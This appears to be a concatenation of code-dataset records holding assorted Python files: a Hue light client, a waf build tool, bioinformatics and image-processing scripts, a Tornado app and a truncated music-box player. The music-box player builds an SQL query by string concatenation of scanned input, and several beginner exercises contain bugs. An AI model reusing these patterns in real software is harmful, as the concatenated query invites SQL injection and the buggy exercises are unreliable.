counter + 1\n else:\n print(\"Incorrect\")\nprint(counter)\n\nevaluations = ['flunk', 'poor', 'mediocre', 'adequate', 'good', 'great']\nprint(f\"This student did {evaluations[counter]}\")","repo_name":"PdxCodeGuild/class_mudpuppy","sub_path":"1 Python/hints/lab_14/scantron_checker_fun.py","file_name":"scantron_checker_fun.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42777938676","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 22:20:49 2020\n\n@author: con\n\"\"\"\n\nimport requests\nimport time\nimport random\nimport os\nfrom pathlib import Path\nimport json\nfrom rgbxy import Converter\nfrom rgbxy import GamutA\n\nfrom custom_errors import *\n\n\nclass Bridge:\n def __init__(self):\n self.ipaddress = ''\n self.userid = ''\n\n def get_lights(self):\n \"\"\"\n Get all lights connected to bridge\n \"\"\"\n api_string = self.ipaddress + 'api/' + self.userid + '/lights'\n resp = requests.get(api_string)\n if resp.status_code != 200:\n raise Exception(api_string, resp.status_code) from None\n else:\n return resp.json()\n\n def set_state(self, task, light):\n \"\"\"\n Set state of light\n \"\"\"\n api_string = self.ipaddress + 'api/' + self.userid + '/lights/' + str(light) + '/state'\n resp = requests.put(api_string, json=task)\n # when response is blank it failed!\n try:\n json_error_details = resp.json()[0]['error']\n self.error_handler(json_error_details)\n except KeyError:\n if resp.status_code != 200:\n raise Exception(api_string, resp.status_code) from None # Improve\n\n def get_ip_address(self):\n resp = requests.get('https://discovery.meethue.com/')\n return 'http://' + resp.json()[0]['internalipaddress'] + '/'\n\n def create_user(self):\n \"\"\"\n Register new user on Bridge, returns username if successful\n \"\"\"\n api_string = self.ipaddress + 'api'\n resp = requests.post(api_string, json={'devicetype': 'philip'})\n if 'error' in resp.json()[0]:\n self.error_handler(resp.json()[0]['error'])\n else:\n return resp.json()[0]['success']['username']\n\n def get_state(self, light):\n \"\"\"\n Gets state of light\n \"\"\"\n api_string = self.ipaddress + 'api/' + self.userid + '/lights/' + str(light)\n resp = ''\n try:\n resp = requests.get(api_string)\n return resp.json()['state']\n except TypeError:\n json_error_details = resp.json()[0]\n if 'error' in resp.json()[0]:\n print(json_error_details)\n self.error_handler(json_error_details['error'])\n except requests.exceptions.MissingSchema:\n return {}\n\n def check_connection(self, ip_add, user_id):\n api_string = ip_add + 'api/' + user_id\n status = True\n try:\n resp = requests.get(api_string)\n if type(resp.json()) is list:\n if 'error' in resp.json()[0]:\n status = False\n except requests.exceptions.MissingSchema:\n status = False\n finally:\n return status\n\n def connected(self):\n return self.check_connection(self.ipaddress, self.userid)\n\n def connect(self):\n config_path = os.getenv('HOME') + '/hue/'\n try:\n with open(config_path + 'config.txt') as json_file:\n data = json.load(json_file)\n if self.check_connection(data['ip_address'], data['user_id']):\n self.ipaddress = data['ip_address']\n self.userid = data['user_id']\n except (FileNotFoundError, json.decoder.JSONDecodeError):\n if not Path.exists(Path(config_path)):\n os.mkdir(config_path)\n self.ipaddress = self.get_ip_address()\n self.userid = self.create_user()\n json_config = {\n \"ip_address\": self.ipaddress,\n \"user_id\": 
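As an aside on the scantron record above: make_rand_answers() can collapse to a single call, since random.choices draws k independent picks with replacement:

import random
print(random.choices(['a', 'b', 'c', 'd', 'e'], k=5))   # e.g. ['b', 'e', 'a', 'a', 'd']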
self.userid\n }\n self.ipaddress = self.ipaddress\n self.userid = self.userid\n with open(config_path + 'config.txt', 'w') as outfile:\n json.dump(json_config, outfile)\n\n def error_handler(self, json_error_details):\n if json_error_details['type'] == 1:\n raise UnauthorizedUserError\n elif json_error_details['type'] == 101:\n raise LinkButtonNotPressedError\n elif json_error_details['type'] == 201:\n raise DeviceIsOffError\n else:\n raise GenericHueError(json_error_details)\n\n\nclass Light:\n def __init__(self, bridge, light_id):\n self.color_converter = Converter(GamutA)\n self.speed = 0\n self.userid = bridge.userid\n self.ipaddress = bridge.ipaddress\n self.light_id = light_id\n self.bridge = bridge\n self.strobe = False\n\n def get_status(self):\n return self.bridge.get_state(self.light_id)\n\n def on(self):\n task = {'on': True}\n self.get_color()\n self.bridge.set_state(task, self.light_id)\n\n def off(self):\n task = {'on': False}\n self.bridge.set_state(task, self.light_id)\n\n def brightness(self, percent):\n task = {\"bri\": percent}\n self.bridge.set_state(task, self.light_id)\n\n def strobe_start(self, colors, speed, is_random):\n prev_color = ''\n self.strobe = True\n self.speed = speed\n while self.strobe and self.speed < 4.5:\n if is_random: # Needs to be cleaned up to match non-random\n new_colors = colors[:]\n if prev_color != '':\n new_colors.remove(prev_color)\n prev_color = random.choice(new_colors)\n self.color(prev_color)\n time.sleep(int(self.speed))\n else:\n color_index = 0\n while color_index < len(colors) and self.speed < 4.5:\n self.color(colors[color_index])\n prev_speed = self.speed\n no_itr = self.speed / 0.1\n for i in range(int(no_itr)):\n if prev_speed != self.speed:\n break\n time.sleep(0.1)\n if self.speed == prev_speed:\n color_index += 1\n elif color_index == len(colors) - 1:\n color_index = 0\n\n def strobe_stop(self):\n self.strobe = False\n\n def strobe_speed(self, speed):\n self.speed = speed\n\n def color(self, color):\n xy_color = color[1:] # Remove '#' from hex value\n xy_color = self.color_converter.hex_to_xy(xy_color)\n\n try:\n task = {\"xy\": xy_color}\n self.bridge.set_state(task, self.light_id)\n except KeyError:\n raise ValueError('Color does not exist') from None\n\n def get_color(self):\n xy_color = self.get_status()['xy']\n hex_color = self.color_converter.xy_to_hex(xy_color[0], xy_color[1])\n return hex_color\n","repo_name":"connorjrw/hue_gui","sub_path":"hue.py","file_name":"hue.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6731405986","text":"import os\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method, taskgen_method\nfrom waflib import Utils, Logs, Task, Context, Errors, Options\n\ndef configure(conf):\n\tdotnet = []\n\tif Utils.unversioned_sys_platform() != 'win32':\n\t\tconf.find_program('mono')\n\t\tdotnet = conf.env['MONO']\n\n\tbootstrapper = os.path.abspath(os.path.join(\n\t\t'paket',\n\t\t'.paket', \n\t\t'paket.bootstrapper.exe'\n\t))\n\n\tpaket = os.path.abspath(os.path.join(\n\t\t'paket',\n\t\t'.paket', \n\t\t'paket.exe'\n\t))\n\n\tif not Options.options.nopaket:\n\t\tconf.cmd_and_log(dotnet + [bootstrapper], cwd='paket')\n\t\tconf.cmd_and_log(dotnet + [paket, 'restore'], cwd='paket')\n\n\t\t# Replace user-overridden files after paket restore\n\t\toverrides = conf.path.find_dir('paket/overrides').ant_glob('*')\n\t\tpackages = 
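A minimal round-trip sketch for the Light.color()/get_color() pair above, using only the rgbxy calls the class itself makes (Converter with GamutA, hex_to_xy, xy_to_hex). Note that color() strips the leading '#' before converting, and gamut clamping can make the round trip lossy for out-of-gamut colors:

from rgbxy import Converter, GamutA

conv = Converter(GamutA)
x, y = conv.hex_to_xy('ff0000')   # no leading '#', matching color()
print(x, y)                       # CIE xy chromaticity of red
print(conv.xy_to_hex(x, y))       # back to a (gamut-clamped) hex string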
conf.path.find_dir('paket/packages').ant_glob('**/*')\n\n\t\tfor p in packages:\n\t\t\tfor o in overrides:\n\t\t\t\tif p.name == o.name:\n\t\t\t\t\tif Logs.verbose > 0:\n\t\t\t\t\t\tLogs.info('copy %s %s' % (o.abspath(), p.abspath()))\n\t\t\t\t\tp.write(o.read())\n\n\n\tconf.env.append_value('supported_features', 'paket')\n\ndef options(ctx):\n\tctx.add_option('--nopaket', action='store_true', default=False, help='Don\\'t restore paket packages')\n\nclass Package(object):\n\tdef __init__(self, bld, group, name, node):\n\t\tself.group = group\n\t\tself.name = name\n\t\tself.deps = []\n\t\tself.byfx = {}\n\n\t\tself.create_tgs(bld, node.find_dir('lib'), False)\n\t\tself.create_tgs(bld, node.find_dir('ref'), True)\n\n\tdef create_tgs(self, bld, node, is_ref):\n\t\tif node is None:\n\t\t\treturn\n\n\t\troot = node.abspath()\n\t\tfor fx in os.listdir(root):\n\t\t\tfx_path = os.path.join(root, fx)\n\t\t\tif os.path.isdir(fx_path):\n\t\t\t\tif fx in self.byfx:\n\t\t\t\t\tcontinue\n\t\t\t\tfx_node = node.make_node(fx)\n\t\t\t\tfor file in os.listdir(fx_path):\n\t\t\t\t\text = os.path.splitext(file)[1]\n\t\t\t\t\tif ext == '.dll':\n\t\t\t\t\t\tself.make_nuget_lib(bld, fx, fx_node.make_node(file), is_ref)\n\t\t\telif not is_ref:\n\t\t\t\text = os.path.splitext(fx)[1]\n\t\t\t\tif ext == '.dll':\n\t\t\t\t\tself.make_nuget_lib(bld, 'lib', node.make_node(fx), is_ref)\n\n\tdef make_nuget_lib(self, bld, fx, node, is_ref):\n\t\t# print 'make: %s, %s, %s' % (fx, node, is_ref)\n\t\t# nuget_lib will make a fake_csshlib which will\n\t\t# cause install_outputs() to be called and it will\n\t\t# put the .dll, .pdb and .config into the ${BINDIR}\n\t\ttg = bld(\n\t\t\tname='%s:%s:%s:%s' % (self.group, self.name, fx, node.name),\n\t\t\tinstall_path = '${BINDIR}',\n\t\t\tfeatures='nuget_lib',\n\t\t\tnode=node,\n\t\t\tis_ref=is_ref\n\t\t)\n\t\tlst = self.byfx.setdefault(fx, [])\n\t\tlst.append(tg)\n\n\tdef __repr__(self):\n\t\treturn '%s/%s: %s' % (self.group, self.name, self.byfx)\n\n@conf\ndef read_paket(self, lockfile):\n\tif not self.env.MCS:\n\t\treturn\n\n\tpkgs = {}\n\tgroup = ''\n\tgroups = { group : pkgs }\n\tparent = None\n\troot = self.path.find_dir('packages')\n\tnode = root\n\n\tsrc = self.path.find_resource(lockfile)\n\tif src:\n\t\tignore = False\n\t\tcontents = src.read()\n\t\tfor line in contents.splitlines():\n\t\t\tif line.startswith('GROUP'):\n\t\t\t\tgroup = line[6:]\n\t\t\t\tpkgs = {}\n\t\t\t\tgroups[group] = pkgs\n\t\t\t\tparent = None\n\t\t\t\tnode = root.find_dir(group)\n\t\t\telif line.startswith('NUGET'):\n\t\t\t\tignore = False\n\t\t\telif line.startswith('HTTP'):\n\t\t\t\tignore = True\n\t\t\telif not ignore:\n\t\t\t\tsuffix = line.lstrip(' ')\n\t\t\t\tdepth = (len(line) - len(suffix)) / 2\n\t\t\t\tif depth == 2:\n\t\t\t\t\tname = suffix.split()[0]\n\t\t\t\t\tparent = pkgs.get(name)\n\t\t\t\t\tif parent is None:\n\t\t\t\t\t\tparent = Package(self, group, name, node.find_dir(name))\n\t\t\t\t\t\tpkgs[name] = parent\n\t\t\t\telif depth == 3:\n\t\t\t\t\tpkg = suffix.split()[0]\n\t\t\t\t\tparent.deps.append(pkg)\n\n\tself.env.PAKET_PACKAGES = groups\n\n@feature('cs', 'paket')\n@before_method('install_packages')\ndef use_nuget(self):\n\tpkgs = getattr(self, 'use_packages', None)\n\tif not pkgs:\n\t\treturn\n\n\tsettings = dict(\n\t\texcludes = [],\n\t\tframeworks = [],\n\t\tgroup = ''\n\t)\n\n\tnew_settings = getattr(self, 'paket_settings')\n\tif new_settings:\n\t\tsettings.update(new_settings)\n\n\tuse = self.to_list(getattr(self, 'use', []))\n\n\ttgs = set()\n\n\tfor pkg in 
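use_packages_recurse() below is a depth-first walk over the package graph with an exclude list. The same traversal as a self-contained sketch, with a visited check added so shared dependencies are collected once (the package names are invented):

def walk_deps(pkg, deps_by_pkg, excludes, into):
    if pkg in excludes or pkg in into:
        return
    into.add(pkg)
    for child in deps_by_pkg.get(pkg, ()):
        walk_deps(child, deps_by_pkg, excludes, into)

deps = {'App': ['Json', 'Log'], 'Json': ['Core'], 'Log': ['Core']}
found = set()
walk_deps('App', deps, excludes={'Log'}, into=found)
print(sorted(found))   # ['App', 'Core', 'Json']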
pkgs:\n\t\tuse_packages_recurse(self, pkg, settings, tgs)\n\n\tfor tg in sorted(tgs, key=lambda x: x.target):\n\t\t# print 'use: %s' % tg.name\n\t\tuse.append(tg.name)\n\ndef use_packages_recurse(self, pkg, settings, into):\n\tif pkg in settings['excludes']:\n\t\treturn\n\n\tgroup = self.env.PAKET_PACKAGES.get(settings['group'])\n\tif group is None:\n\t\tself.bld.fatal('%r uses unknown paket group %r' % (self.name, settings['group']))\n\n\tdep = group.get(pkg)\n\tif dep is None:\n\t\tself.bld.fatal('%r depends on unknown package %r' % (self.name, pkg))\n\n\ttgs = get_pkg_for_fx(dep, settings['frameworks'])\n\tif tgs is None:\n\t\tself.bld.fatal('%r depends on unknown framework for package %r, available frameworks: %r' % (\n\t\t\tself.name, pkg, dep.byfx.keys()\n\t\t))\n\n\tfor tg in tgs:\n\t\tif not tg.is_ref:\n\t\t\tinto.add(tg)\n\n\tfor child in dep.deps:\n\t\tuse_packages_recurse(self, child, settings, into)\n\ndef get_pkg_for_fx(dep, fxs):\n\tfor fx in fxs:\n\t\ttgs = dep.byfx.get(fx)\n\t\tif tgs:\n\t\t\treturn tgs\n\treturn None\n\n@feature('nuget_lib')\ndef process_nuget_lib(self):\n\t# self.node.sig = Utils.h_file(self.node.abspath())\n\n\tself.link_task = self.create_task('fake_csshlib', [], [self.node])\n\tself.target = self.node.name\n","repo_name":"sfncat/peach","sub_path":"pfce/pfce_src/build/tools/paket.py","file_name":"paket.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11983779005","text":"from datetime import datetime\n\n\ndef normalize_fields_from_list(response: list, new_fields: dict):\n if not type(response) == list:\n raise Exception(\n f\"Response sent is of type {type(response)}. Should be list\")\n for item in response:\n for old, new in new_fields.items():\n\n item[new] = item[old]\n del item[old]\n\n return response\n\n\ndef transform_to_week(year, week):\n return datetime.strptime(f\"{year}-{week}-1\", \"%G-%V-%u\")\n","repo_name":"Extibax/demon333-rm-lrm-v1-api","sub_path":"api/common/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21031524001","text":"try:\n bölünen = int(input(\"Bölünen sayıyı giriniz: \"))\n bölen = int(input(\"Bölen sayıyı giriniz: \"))\n sonuç = bölünen / bölen\nexcept ValueError:\n print(\"Lütfen sadece sayı giriniz.\")\nexcept ZeroDivisionError:\n print(\"Bölen sıfır olamaz.\")\nfinally:\n print(\"Sonuç:\", sonuç)\n","repo_name":"Neodevils/programming-tests","sub_path":"python/try_expect_else.py","file_name":"try_expect_else.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21025759477","text":"file = open('Hack8_Sample_Text.txt')\nfile.close()\n\ntry:\n f = open(\"Hack8_Sample_Text.txt\", encoding='utf-8')\nexcept FileNotFoundError:\n print(\"File not Found\")\n\nwith open(\"sample.txt\", 'w', encoding='utf-8') as f:\n f.write(\"my first file\\n\")\n f.write(\"This file\\n\\n\")\n f.write(\"contains three lines\\n\")\n\nwith open('sample.txt', 'r') as reader:\n # Read & print the entire file\n print(reader.read())\n\nimport sys\n\n\ndef os_interaction():\n assert ('linux' in sys.platform), \"Function can only run on Linux systems.\"\n assert ('win' in sys.platform), \"This code runs on Windows only.\"\n print('Doing something.')\n\n\ntry:\n os_interaction()\nexcept AssertionError as 
error:\n print(error)\n print('The os_interaction() function was not executed')\n\nprint('')\n\ntry:\n os_interaction()\nexcept AssertionError as error:\n print(error)\n print('os_interaction() function was not executed')\nelse:\n try:\n with open('sample.txt') as file:\n read_data = file.read()\n print(read_data)\n except FileNotFoundError as fnf_error:\n print(fnf_error)\nfinally:\n print('Cleaning up, irrespective of any exceptions')","repo_name":"abitale/python_belajar","sub_path":"sesi04/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1944403102","text":"def convolution(spectrum):\n n = len(spectrum)\n dic = {}\n for i in range(n):\n for j in range(n-1):\n if (j == i):\n break\n diff = int(abs(spectrum[i] - spectrum[j]))\n\n if diff == 0:\n continue\n if diff in dic.keys():\n dic[diff] += 1\n else:\n dic[diff] = 1\n\n List = []\n for k in dic:\n List.append((dic[k], k))\n List = sorted(List)\n List = List[::-1]\n \n for t in List:\n val = t[1]\n cnt = t[0]\n for j in range(cnt):\n print(val, end=\" \")\n\nif __name__ == \"__main__\":\n spectrum = [0, 137, 186, 323]\n with open('rosalind_ba4h.txt', \"r\") as file:\n spectrum = []\n f = file.read().strip().split()\n for val in f:\n spectrum.append(int(val))\n convolution(spectrum)\n","repo_name":"Jak57/bio-informatics-lab","sub_path":"BA4H.py","file_name":"BA4H.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14642467342","text":"from abc import ABC\nfrom typing import Optional, Union\n\nfrom ..element import InteractiveElement\nfrom ...common.definitions import ElementTypes, CollisionTypes\nfrom ...configs.parser import parse_configuration\n\n\nclass AuraElement(InteractiveElement, ABC):\n \"\"\"\n Base class for entities that provide reward to an agent in its proximity.\n \"\"\"\n def __init__(self,\n reward: float,\n total_reward: Optional[float] = None,\n config_key: Optional[Union[ElementTypes, str]] = None,\n **entity_params):\n \"\"\"\n VisibleRewardZone entities provide a reward to the agent\n in close proximity with the entity.\n\n Args:\n **kwargs: other params to configure entity. 
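The spectral-convolution record above compresses nicely with collections.Counter while keeping its output order (higher multiplicity first, ties broken by the larger mass); for the sample spectrum [0, 137, 186, 323] both versions print 186 186 137 137 323 49:

from collections import Counter

def convolution_counter(spectrum):
    diffs = Counter(abs(a - b)
                    for i, a in enumerate(spectrum)
                    for b in spectrum[:i] if a != b)
    return [m for m, c in sorted(diffs.items(), key=lambda kv: (-kv[1], -kv[0]))
            for _ in range(c)]

print(*convolution_counter([0, 137, 186, 323]))   # 186 186 137 137 323 49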
Refer to Entity class\n\n        Keyword Args:\n            reward: Reward provided at each timestep when agent is in proximity\n            total_reward: Total reward that the entity can provide during an Episode\n        \"\"\"\n\n        default_config = parse_configuration('element_proximity', config_key)\n        entity_params = {**default_config, **entity_params}\n\n        if total_reward:\n            assert reward * total_reward > 0\n\n        super().__init__(visible_shape=True,\n                         invisible_shape=True,\n                         reward=reward,\n                         **entity_params)\n\n        self._limit = total_reward\n        self._total_reward_provided = 0\n\n    @property\n    def reward(self):\n        rew = super().reward\n\n        if self._limit:\n            reward_left = self._limit - self._total_reward_provided\n\n            if abs(rew) > abs(reward_left):\n                rew = reward_left\n\n        self._total_reward_provided += rew\n        return rew\n\n    @reward.setter\n    def reward(self, rew: float):\n        self._reward = rew\n\n    def reset(self):\n        self._total_reward_provided = 0\n        super().reset()\n\n    @property\n    def terminate_upon_activation(self):\n        return False\n\n    def activate(self, _):\n        return None, None\n\n    def _set_shape_collision(self):\n        self.pm_invisible_shape.collision_type = CollisionTypes.CONTACT\n\n\nclass Fairy(AuraElement):\n    \"\"\"\n    Fairy entities provide a reward to an agent which is in proximity.\n\n    Provides a positive reward of 2 for each timestep when an agent is in proximity.\n    Default: Turquoise-blue circle of radius 8, reward 2 and total_reward 200.\n\n    \"\"\"\n    def __init__(self,\n                 reward: float,\n                 total_reward: Optional[float] = None,\n                 **entity_params):\n\n        super().__init__(config_key=ElementTypes.FAIRY,\n                         reward=reward,\n                         total_reward=total_reward,\n                         **entity_params)\n\n\nclass Fireball(AuraElement):\n    \"\"\"\n    Fireball entities provide a negative reward to an agent which is in proximity.\n\n    Provides a negative reward of 2 for each timestep when an agent is in proximity.\n    Default: Red circle of radius 8, reward -2 and total_reward -200.\n\n    \"\"\"\n    def __init__(self,\n                 reward: float,\n                 total_reward: Optional[float] = None,\n                 **entity_params):\n        super().__init__(config_key=ElementTypes.FIREBALL,\n                         reward=reward,\n                         total_reward=total_reward,\n                         **entity_params)\n","repo_name":"emasquil/simple-playgrounds","sub_path":"src/simple_playgrounds/element/elements/aura.py","file_name":"aura.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
{"seq_id":"22942327900","text":"import cv2 as cv\nimport numpy as np\n\ndef get_image_info(image):\n    # image is a numpy array, so whatever numpy can do can be done to the image\n    print(type(image))\n    print(image.shape)\n    print(image.size)\n    print(image.dtype)\n\n    pixel_data = np.array(image)\n    print(pixel_data)\n\n# this binarization helper is all I need here\ndef global_threshold(image, image_name):\n    gray = cv.cvtColor(image, cv.COLOR_RGB2GRAY) # convert the input image to grayscale\n    high = gray.shape[0]\n    weight = gray.shape[1]\n    for cow in range(high):\n        for col in range(weight):\n            pv = gray[cow, col]\n            if pv != 255:\n                gray[cow, col] = 0\n    cv.namedWindow(image_name, cv.WINDOW_NORMAL)\n    cv.imshow(image_name, gray)\n\ndef process_case3():\n    url = '/Users/allen/Desktop/map/'\n    for i in range(10):\n        img = cv.imread(url + str(i) + '.png')\n        new_image = cv.resize(img,(200, 200))\n        img_gray = cv.cvtColor(new_image, cv.COLOR_RGB2GRAY)\n\n        h, w = img_gray.shape[:2]\n        for row in range(h):\n            for col in range(w):\n                if img_gray[row, col] >20:\n                    img_gray[row, col] = 255\n                else:\n                    img_gray[row,col] = 0\n        pixel_data = np.array(img_gray) # matrix-like array\n        np.savetxt(url+'csv/'+str(i)+'.csv', pixel_data, delimiter = ',')\n\n\nif 
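The per-pixel loops in global_threshold() and process_case3() above can be replaced by one vectorized numpy expression, which is shorter and far faster on 200x200 images; a hedged equivalent of the inner thresholding step:

import numpy as np

img_gray = np.array([[5, 30], [200, 10]], dtype=np.uint8)   # stand-in image
binary = np.where(img_gray > 20, 255, 0).astype(np.uint8)
print(binary)   # [[  0 255]
                #  [255   0]]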
__name__ == '__main__':\n    process_case3()","repo_name":"allenhsu6/python-jps","sub_path":"src/image_process.py","file_name":"image_process.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"38611475680","text":"import tornado.web\nimport views.index as index\nimport config\nclass Application(tornado.web.Application):\n    def __init__(self):\n        handler = [\n            #(r\"/\",index.IndexHandler),\n            #(r\"/home\",index.HomeHandler,{\"name\":\"jack\",\"age\":100}),\n            #tornado.web.url(r\"/caasdsadasdsasm\",index.CsmHandler,{\"name\":\"b\",\"age\":\"d\"},name=\"csm\"),\n            #(r\"/liuyifei/(\\w+)/(\\w+)/(\\w+)\",index.LiuYiFeiHandler),\n            #(r\"/liuyifei/(?P\\w+)/(?P\\w+)/(?P\\w+)\", index.LiuYiFeiHandler),\n            #(r\"/zhangmanyu\",index.ZhanmanyuHandler),\n            #(r\"/postfile\",index.PostfileHanlder),\n            #(r\"/zhuyi\",index.ZhuyiHandler),\n            #(r\"/upfile\",index.UpfileHandler),\n\n            #(r\"/write\",index.WriteHandler),\n\n            #(r\"/json1\",index.JsonHandler),\n            #(r\"/json2\",index.Json2Handler),\n\n            #(r\"/status\",index.StatusHandler),\n\n            #(r\"/header\",index.HeaderHandler),\n\n            #(r\"/index\",index.RedirectHander),\n\n            #(r\"/error\",index.ErrorHandler),\n\n            #(r\"/method\",index.MethodHandler),\n\n            (r\"/jackcsm\",index.JackHandler),\n        ]\n        print(config.settings)\n        super(Application,self).__init__(handler,**config.settings)","repo_name":"immortalChensm/python","sub_path":"tornado框架/project/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"19442218201","text":"from torch.utils.data.dataset import Dataset\nimport numpy as np\nfrom dataset import DPENDataset\nfrom torch.utils.data import DataLoader\nimport os\nimport torch.optim as optim\nimport torch\nimport argparse\nimport random\nfrom estimate_params import DPEN\nimport torch.nn as nn\n\n\ndef main(**args):\n\t# set seed to ensure reproducibility\n\tseed = args['random_seed']\n\ttorch.manual_seed(seed)\n\tnp.random.seed(seed)\n\trandom.seed(seed)\n\ttorch.backends.cudnn.benchmark = False # CUDNN optimization\n\ttorch.backends.cudnn.deterministic = True\n\n\tps = args['patch_size']\n\n\t# load datasets\n\tvalset = DPENDataset(args['valset_dir'], min_sigma=args['sigma'], max_sigma=args['sigma'], min_q=args['q'], max_q=args['q'], patch_size=ps, is_test=True)\n\tval_dl = DataLoader(valset)\n\n\t# create DPEN model and set training params\n\tmodel = DPEN()\n\tmodel.load_state_dict(torch.load(args['DPEN_model']))\n\tmodel = model.cuda()\n\n\t# evaluate the model\n\tsigma = []\n\tq = []\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tfor _, data in enumerate(val_dl):\n\t\t\tdata, _, _ = data\n\t\t\tdata = data.cuda()\n\t\t\tlocal_est_sigma = []\n\t\t\tlocal_est_q = []\n\t\t\t_, _, H, W = data.shape\n\t\t\tfor h in range((H % ps) // 2, H - ps, ps):\n\t\t\t\tfor w in range((W % ps) // 2, W - ps, ps):\n\t\t\t\t\tpatch = data[:, :, h:h + ps, w:w + ps]\n\t\t\t\t\testimated_noisestd, estimated_q = model(patch)\n\t\t\t\t\tlocal_est_sigma.append(float(estimated_noisestd[0]))\n\t\t\t\t\tlocal_est_q.append(float(estimated_q[0]))\n\t\t\tsigma.append(np.mean(local_est_sigma))\n\t\t\tq.append(np.mean(local_est_q))\n\tsigma = np.array(sigma)\n\tq = np.array(q)\n\tmae_sigma = np.mean(np.abs(sigma * 255 - args['sigma']))\n\tmae_q = np.mean(np.abs(q * 100 - args['q']))\n\tprint('MAE for sigma: %f, MAE for q: %f' % (mae_sigma, mae_q))\n\n\nif 
'__main__':\n\tparser = argparse.ArgumentParser(description=\"Test DPEN\")\n\tparser.add_argument(\"--random_seed\", type=int, default=0, help=\"Random seed to ensure reproducibility\")\n\tparser.add_argument(\"--sigma\", type=int, default=30, \\\n\t\t\t\t\t help=\"Sigma value for AWGN\")\n\tparser.add_argument(\"--patch_size\", \"--p\", type=int, default=64, help=\"Patch size\")\n\tparser.add_argument(\"--q\", type=int, default=25, \\\n\t\t\t\t\t\thelp=\"Q value for jpeg compression\")\n\tparser.add_argument(\"--valset_dir\", type=str, default=None, \\\n\t\t\t\t\t\t help='path of validation set')\n\tparser.add_argument(\"--DPEN_model\", type=str, default='./pretrained_models/DPEN_pretrained.pth', \\\n\t\t\t\t\t\thelp=\"Pretrained DPEN model to estimate distortion parameters\")\n\targspar = parser.parse_args()\n\n\tprint(\"\\n### Testing DPEN model ###\")\n\tprint(\"> Parameters:\")\n\tfor p, v in zip(argspar.__dict__.keys(), argspar.__dict__.values()):\n\t\tprint('\\t{}: {}'.format(p, v))\n\tprint('\\n')\n\tmain(**vars(argspar))\n\t\n\t\n","repo_name":"claudiom4sir/MdVRNet","sub_path":"test_dpen.py","file_name":"test_dpen.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"17312811508","text":"#!/usr/bin/python3\n\nimport tkinter\nimport tkinter.font\nimport sqlite3\nimport vlc\nimport time\nfrom pathlib import Path\n\n# set some of the main window properties\nplayerWindow = tkinter.Tk()\nplayerWindow.geometry(\"480x320\")\nplayerWindow.title(\"Music Box\")\nmyFont = tkinter.font.Font(family='Helvetica', size=12, weight=\"bold\")\nplaylistFont = tkinter.font.Font(family='Helvetica', size=10)\n\n# the root directory where music will be stored\nrootMusicPath = Path(\"/music/\")\n\n# persistent playlist variable\nplaylist = []\nplaylistPos = 0\n\n# create the VLC objects we need -- a player, a media list, a media list player, and an event manager for the media player in the media list player\nplayer = vlc.Instance()\nmediaList = player.media_list_new()\nlistPlayer = player.media_list_player_new()\nevents = listPlayer.get_media_player().event_manager()\n\ndef prevTrack():\n\tglobal playlistPos\n\t\n\tif playlistPos > 0:\n\t\tplaylistPos -= 1\n\t\tlistPlayer.previous()\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\ndef pauseTrack():\n\tglobal playlistPos\n\t\n\tif listPlayer.is_playing():\n\t\tlistPlayer.pause()\n\t\tpauseButton.config(text=\">\")\n\t\tnpLabel.config(text=\"Now playing: Paused\")\n\telse:\n\t\tlistPlayer.play()\n\t\tpauseButton.config(text=\"||\")\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\ndef stopTrack():\n\tif listPlayer.is_playing():\n\t\tlistPlayer.stop()\n\t\tpauseButton.config(text=\">\")\n\t\tnpLabel.config(text=\"Now playing: Stopped\")\n\ndef nextTrack():\n\tglobal playlistPos\n\t\n\tif playlistPos < (len(playlist) - 1):\n\t\tplaylistPos += 1\n\t\tlistPlayer.next()\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\ndef exitProgram():\n\tplayerWindow.quit()\n\t\ndef scanHandler(event=None):\n\tfetchAlbum(barcodeEntry.get())\n\t\ndef fetchAlbum(barcode):\n\n\tbarcodeEntry.delete(0, tkinter.END)\n\n\t# set up connection to SQLite3 database\n\tconn = sqlite3.connect(\"/home/pi/musicBox/music.db\")\n\tcurs = conn.cursor()\n\n\t# find the path to the files using the barcode\n\tquery = \"SELECT albumPath FROM albums WHERE albumID = \" + 
